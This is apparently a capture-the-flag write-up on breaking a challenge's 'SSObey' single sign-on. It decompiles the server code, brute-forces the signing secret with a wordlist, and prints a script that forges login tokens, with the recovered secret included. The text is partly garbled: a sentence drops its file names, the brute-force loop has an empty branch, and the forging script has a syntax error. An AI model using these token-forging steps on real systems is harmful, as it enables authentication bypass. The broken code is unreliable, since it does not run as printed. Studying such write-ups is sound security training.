
The website providers the server code (See the Powered by SSObey link). It seems to be python 3 pex archive, it can be extracted using 7zip.

Decompiling pyc files:

uncompyle6 .\sso_client\.deps\ssobey-20180117-py3-none-any.whl\ssobey\config_example.pyc > decompiled/ssobey/
uncompyle6 .\sso_client\.deps\ssobey-20180117-py3-none-any.whl\ssobey\util.pyc > decompiled/ssobey/
uncompyle6 .\sso_client\.deps\ssobey-20180117-py3-none-any.whl\ssobey\web.pyc > decompiled/ssobey/

The most important src files are and

SCRAMBLE_KEY = 'CgEZBz4vSHDK'.encode()

def xor(plaintext, key):
    r = []
    for x, y in zip(plaintext, key):
        r.append(x ^ y)

    return bytes(r)

def obey_the_signature(data):
    secret = xor(binascii.hexlify(app.config['SSO_SECRET']), SCRAMBLE_KEY)
    proof = hashlib.sha256(secret + data).hexdigest()
    return proof

def calc_sso_token(user):
    proof = obey_the_signature(user.encode())
    tok = json.dumps({'user': user, 'proof': proof})
    return base64.urlsafe_b64encode(tok.encode())

def is_blacklisted(user):
    for blacklisted in app.config['BLACKLIST']:
        if user == blacklisted['user']:
            return True

    return False

def verify_sso_token(tok):
    dt = base64.urlsafe_b64decode(tok)
    jt = json.loads(dt)
    if is_blacklisted(jt['user']):
        return abort(500, 'This user is blacklisted')
    wantsig = obey_the_signature(jt['user'].encode())
    recvsig = jt['proof']
    if wantsig != recvsig:
        return abort(500, 'Incorrect SSObey token')
    return jt

@app.route('/', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('index.html')
    username, password = request.form['username'], request.form['password']
    if is_blacklisted(username):
        flash('This user is blacklisted.', 'danger')
        return render_template('index.html')
    okpass = app.config['USERS'].get(username)
    if okpass is None:
        flash('User does not exist.', 'danger')
        return render_template('index.html')
    if okpass != password:
        flash('Wrong password.', 'danger')
        return render_template('index.html')
    tok = calc_sso_token(username)
    retaddr = request.args.get('returnTo')
    if retaddr:
        u = url_parse(retaddr)
        q = u.decode_query()
        q['ssobey_token'] = tok
        nu = u.replace(query=url_encode(q))
        return redirect(nu.to_url())
    flash('Ok, now what, no return url...', 'warning')
    return render_template('index.html')

def blacklist():
    return jsonify(app.config['BLACKLIST'])

def test():
    uid = session.get('uid')
    if uid is None:
        tok = request.args.get('ssobey_token')
        if tok is None:
            return redirect(url_for('.login', returnTo=url_for('.test', _external=True)))
        authinfo = verify_sso_token(tok)
        session['uid'] = authinfo['user']
        return redirect(url_for('.test'))
    return render_template('test.html', uid=uid, flag=app.config['FLAG'])

The provides the tokens for blacklisted users:

    "token": "eyJ1c2VyIjogInRlc3QiLCAicHJvb2YiOiAiNTFiNmY0NDJlMDMzNjRlM2JkMDZkZDQxODYwYmU3NDM0MmExMGUwNDhiNmE3Y2NkZDFjNzcxMWQ0ODM3MzYwZSJ9", 
    "user": "test"

Because we know the SCRAMBLE_KEY, username and the proof hash for the blacklisted test user, the sso secret can be brute-forced:

import base64, hashlib, binascii
import json

SCRAMBLE_KEY = 'CgEZBz4vSHDK'.encode()

def xor(plaintext, key):
    r = []
    for x, y in zip(plaintext, key):
        r.append(x ^ y)

    return bytes(r)

def test_secret(pwd):
    secret = xor(binascii.hexlify(pwd), SCRAMBLE_KEY)
    proof = hashlib.sha256(secret + 'test'.encode()).hexdigest()
    return proof == "51b6f442e03364e3bd06dd41860be74342a10e048b6a7ccdd1c7711d4837360e"

with open('/usr/share/wordlists/rockyou.txt', 'rb') as f:
  while True:
    pwd = f.readline()[:-1]
    if not pwd:

    print("%s" % pwd)
    if test_secret(pwd):
      print("Found secret: ", pwd)

The sso secret is 3668301. Forging the token (the token has to be valid to get the flag, username does not matter):

import base64, hashlib, binascii
import json

SCRAMBLE_KEY = 'CgEZBz4vSHDK'.encode()
SSO_SECRET = "3668301".encode()

def xor(plaintext, key):
    r = []
    for x, y in zip(plaintext, key):
        r.append(x ^ y)

    return bytes(r)

def obey_the_signature(data):
    secret = xor(binascii.hexlify(SSO_SECRET), SCRAMBLE_KEY)
    proof = hashlib.sha256(secret + data).hexdigest()
    return proof

def calc_sso_token(user):
    proof = obey_the_signature(user.encode())+
    tok = json.dumps({'user': user, 'proof': proof})
    return base64.urlsafe_b64encode(tok.encode())

print("Token: %s" % calc_sso_token("test2"))